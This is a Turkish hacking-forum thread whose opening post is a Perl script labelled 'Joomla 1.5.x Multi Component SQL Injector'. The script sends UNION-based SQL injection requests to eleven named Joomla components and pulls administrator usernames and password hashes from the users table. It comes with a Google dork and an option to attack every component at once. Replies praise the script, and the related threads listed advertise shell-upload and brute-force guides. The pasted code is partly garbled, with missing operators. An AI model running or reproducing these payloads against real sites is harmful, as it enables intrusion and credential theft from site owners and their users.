Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Joomla 1.5.x Multi Component SQL Injector ()
#1
PHP Kod:
#Exploit Title: Joomla 1.5.x Multi Component SQL Injector ()
    #Exploit Author: D35m0nd142
    #Date: 28/01/2013
    #Google Dork: inurl:"com_..."
    #!/usr/bin/perl
    
use IO::Socket::INET;
    use 
LWP::UserAgent;
    
system("clear");
    print 
"---------------------------------------------\n";
    print 
"  Joomla 1.5.x Multi Component SQL Injector  \n";
    print 
"          Created by D35m0nd142              \n";
    print 
"---------------------------------------------\n\n";
    
$target $ARGV[0];
    
$component $ARGV[1];
    if(
$target eq '' || $component eq '')
    {
    print 
"Usage: ./exploit.pl <target> <component> \n";
    print 
"-----------------------------------\n";
    print 
" Available components :        \n";
    print 
" 1- com_alfurqan15x            \n";
    print 
" 2- com_jobprofile             \n";
    print 
" 3- com_question               \n";
    print 
" 4- com_joomloc                \n";
    print 
" 5- com_joomlub               \n";
    print 
" 6- com_manager                \n";
    print 
" 7- com_iproperty              \n";
    print 
" 8- com_jooproperty               \n";
    print 
" 9- com_digifolio                 \n";
    print 
" 10- com_rdautos                   \n";
    print 
" 11- com_ownbiblio                \n";
    print 
" 12- try to exploit all components \n";
    print 
"-----------------------------------\n";
    print 
" Example: ./exploit.pl http://www.site.com/spa/ 1 \n\n";
    exit(
1);
    }
     
    
open(FILE"> contents11.txt");
     
    if(
$target !~ /http:\/\//)
    
{
    
$target "http://$target";
    }
     
    
sleep 1.5;
    
$agent LWP::UserAgent->new();
    
$agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1');
    if(
$component == 1)
    {
    
$host $target "/index.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+fro​m+jos_users--";
    print 
" . . Exploiting com_alfurqan15x on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password \n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
    }
     
    if(
$component == 2)
    {
    
$host $target "index.php?option=com_jobprofile&amp;Itemid=61&amp;task=profilesview&amp;id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_us​ers--";
    print 
" . . Exploiting com_jobprofile on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
    }
     
    if(
$component == 3)
    {
    
$host $target "/index.php/?option=com_question&amp;catID=21' and+1=0 union all select  # | 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20";
    print 
" . . Exploiting com_question on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
    }
     
    if(
$component == 4)
    {
    
$host $target "/index.php?option=com_joomloc&amp;controller=loc&amp;view=loc&amp;layout=loc&amp;task=edit&amp;cid[]=1&amp;id=1 and 1=2 union select 1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1​8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,​45,46,47,48,49,50,51,52,53,54,55,56+from+jos_users";
    print 
" . . Exploiting com_joomloc on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
    }
     
    if(
$component == 5)
    {
    print 
" . . Exploiting com_joomlub on target $target . . \n\n";
    
sleep 1;
    print 
" . . Trying different types of injection for this component . . wait please . . \n\n";
    
$host $target "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20union%20all%20select%201,2,3,concat(0x3a,username,0x3a,password),5,6,7,8,9,1​0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";
    
$host1 $target "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20union%20all%20select%201,2,3,concat_ws(0x3a,username,0x3a,password),5,6,7,8,​9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";
    
$host2 $target "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20union%20all%20select%201,2,3,concat_ws(0x3a,username,0x3a,password),5,6,7,8,​9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users--%20";
    
$host3 $target "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=2'%20and+1=0%20union%20all%20select%20#%20|%201,2,3,concat_ws(0x3a,u​sername,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25​,26,27,28,29+from+jos_users--%20";
    
$host4$target "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20UNION%20ALL%20SELECT%201,2,3,concat(0x3a,username,0x3a,password),5,6,7,8,9,1​0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";
     
    @
hosts = ($host,$host1,$host2,$host3,$host4);
    foreach 
$hos(@hosts)
    {
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$hos));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"Password found --> $password :) . \n\n";
    
sleep 1;
    }
    else
    {
    print 
"Password not found :( . \n\n";
    
sleep 1;
    }
    }
    }
     
    if(
$component == 6)
    {
    
$host $target "/index.php?option=com_manager&view=flight&Itemid=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_co​ncat(username,char(58),password)v3n0m/**/from/**/jos_users--";
    print 
" . . Exploiting com_manager on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
    }
     
    if(
$component == 7)
    {
    
$host $target "/index.php?option=com_iproperty&view=agentproperties&id=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_co​ncat(username,char(58),password)v3n0m/**/from/**/jos_users--";
    print 
" . . Exploiting com_iproperty on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
    }
     
    if(
$component == 8)
    {
    
$host $target "/index.php?option=com_jooproperty&view=booking&layout=modal&product_id=1%20and%201=0%20union%20select%201,(select group_concat(username,0x3D,password)%20from%20dy978_users)+--+";
    print 
" . . Exploiting com_jooproperty on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
    }
     
    if(
$component == 9)
    {
    
$host $target"/index.php?option=com_digifolio&view=project&id=10/**/and/**/1=2/**/union/**/select/**/1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17​/**/from/**/jos_users--";
    print 
" . . Exploiting com_digifolio on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
    }
     
    if(
$component == 10)
    {
    
$host $target "/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users--&Itemid=54";
    print 
" . . Exploiting com_rdautos on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
    }
     
    if(
$component == 11)
    {
    
$host $target"/index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,1​2,13,14,15,16+from+jos_users--";
    print 
" . . Exploiting com_ownbiblio on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
    }
     
    if(
$component == 12)
    {
    print 
" . . Trying to exploit all available components . . \n\n";
    
sleep 2;
    
$host $target "/index.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+fro​m+jos_users--";
    print 
" . . Exploiting com_alfurqan15x on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password \n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
     
    
sleep 2;
     
    
$host $target "index.php?option=com_jobprofile&amp;Itemid=61&amp;task=profilesview&amp;id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_us​ers--";
    print 
" . . Exploiting com_jobprofile on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
     
    
sleep 2;
     
    
$host $target "/index.php/?option=com_question&amp;catID=21' and+1=0 union all select  # | 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20";
    print 
" . . Exploiting com_question on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
     
    
sleep 2;
     
    
$host $target "/index.php?option=com_joomloc&amp;controller=loc&amp;view=loc&amp;layout=loc&amp;task=edit&amp;cid[]=1&amp;id=1 and 1=2 union select 1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1​8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,​45,46,47,48,49,50,51,52,53,54,55,56+from+jos_users";
    print 
" . . Exploiting com_joomloc on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
     
    
sleep 2;
     
    print 
" . . Exploiting com_joomlub on target $target . . \n\n";
    
sleep 1;
    print 
" . . Trying different types of injection for this component . . wait please . . \n\n";
    
$host $target "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20union%20all%20select%201,2,3,concat(0x3a,username,0x3a,password),5,6,7,8,9,1​0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";
    
$host1 $target "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20union%20all%20select%201,2,3,concat_ws(0x3a,username,0x3a,password),5,6,7,8,​9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";
    
$host2 $target "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20union%20all%20select%201,2,3,concat_ws(0x3a,username,0x3a,password),5,6,7,8,​9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users--%20";
    
$host3 $target "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=2'%20and+1=0%20union%20all%20select%20#%20|%201,2,3,concat_ws(0x3a,u​sername,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25​,26,27,28,29+from+jos_users--%20";
    
$host4$target "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20UNION%20ALL%20SELECT%201,2,3,concat(0x3a,username,0x3a,password),5,6,7,8,9,1​0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";
     
    @
hosts = ($host,$host1,$host2,$host3,$host4);
    foreach 
$hos(@hosts)
    {
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$hos));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"Password found --> $password :) . \n\n";
    
sleep 1;
    }
    else
    {
    print 
"Password not found :( . \n\n";
    }
     
    
sleep 2;
     
    
$host $target "/index.php?option=com_manager&view=flight&Itemid=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_co​ncat(username,char(58),password)v3n0m/**/from/**/jos_users--";
    print 
" . . Exploiting com_manager on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
    }
     
    
sleep 2;
     
    
$host $target "/index.php?option=com_iproperty&view=agentproperties&id=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_co​ncat(username,char(58),password)v3n0m/**/from/**/jos_users--";
    print 
" . . Exploiting com_iproperty on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
     
    
sleep 2;
     
    
$host $target "/index.php?option=com_jooproperty&view=booking&layout=modal&product_id=1%20and%201=0%20union%20select%201,(select group_concat(username,0x3D,password)%20from%20dy978_users)+--+";
    print 
" . . Exploiting com_jooproperty on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
     
    
sleep 2;
     
    
$host $target"/index.php?option=com_digifolio&view=project&id=10/**/and/**/1=2/**/union/**/select/**/1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17​/**/from/**/jos_users--";
    print 
" . . Exploiting com_digifolio on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
     
    
sleep 2;
     
    
$host $target "/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users--&Itemid=54";
    print 
" . . Exploiting com_rdautos on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
     
    
sleep 2;
     
    
$host $target"/index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,1​2,13,14,15,16+from+jos_users--";
    print 
" . . Exploiting com_ownbiblio on target $target . . \n\n";
    
sleep 1;
    
$req $agent->request(HTTP::Request->new(GET=>$host));
    
$content $req->content;
    if(
$content =~ /([0-9a-fA-F]{32})/)
    {
    
$password = $1;
    print 
"[+] Password found --> $password :) .\n\n";
    
sleep 1;
    }
    else
    {
    print 
"[-] Password not found :( . \n\n";
    }
     
    
sleep 2;
     
    print 
"[+] Attack finished. \n\n";
     
    } 


Not:alıntıdır.
Beğenenler:
#2
Bu Çok güzel bir script. Yabancıda Gelmedi. Paylaşım için Teşekkürler.
Beğenenler:
#3
(02-06-2014, Saat: 19:44)Beyaz_Hacker Adlı Kullanıcıdan Alıntı:
Bu Çok güzel bir script. Yabancıda Gelmedi. Paylaşım için Teşekkürler.

Ewet exciting
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Joomla Sistemlere Shell Yükleme Resimli Kısa Anlatım KingSkrupellos 3 81 21-11-2016, Saat: 00:14
Son Yorum: zheeshorn
  Joomla WP BruteForce BatchGuru v1.0 Perl Stallk3r 16 520 05-09-2016, Saat: 00:44
Son Yorum: tartiks
  Serverdeki joomla siteleri ayırma ve brute force archavin 40 3,223 27-07-2016, Saat: 14:53
Son Yorum: MuratAlpTR
  Joomla Sitelere Shell Atma Ayrıntılı Resimli Anlatım KingSkrupellos 1 168 03-07-2016, Saat: 03:57
Son Yorum: BYHAKLİRT
  Joomla Components Scanner Stallk3r 5 271 19-02-2016, Saat: 15:30
Son Yorum: Türkçü
Anahtar Kelimeler

Joomla 1.5.x Multi Component SQL Injector () indir, Joomla 1.5.x Multi Component SQL Injector () Videosu, Joomla 1.5.x Multi Component SQL Injector () Online izle, Joomla 1.5.x Multi Component SQL Injector () Bedava indir, Joomla 1.5.x Multi Component SQL Injector () Yükle, Joomla 1.5.x Multi Component SQL Injector () Hakkında, Joomla 1.5.x Multi Component SQL Injector () Nedir, Joomla 1.5.x Multi Component SQL Injector () Free indir, Joomla 1.5.x Multi Component SQL Injector () Oyunu, Joomla 1.5.x Multi Component SQL Injector () Download


1 Ziyaretçi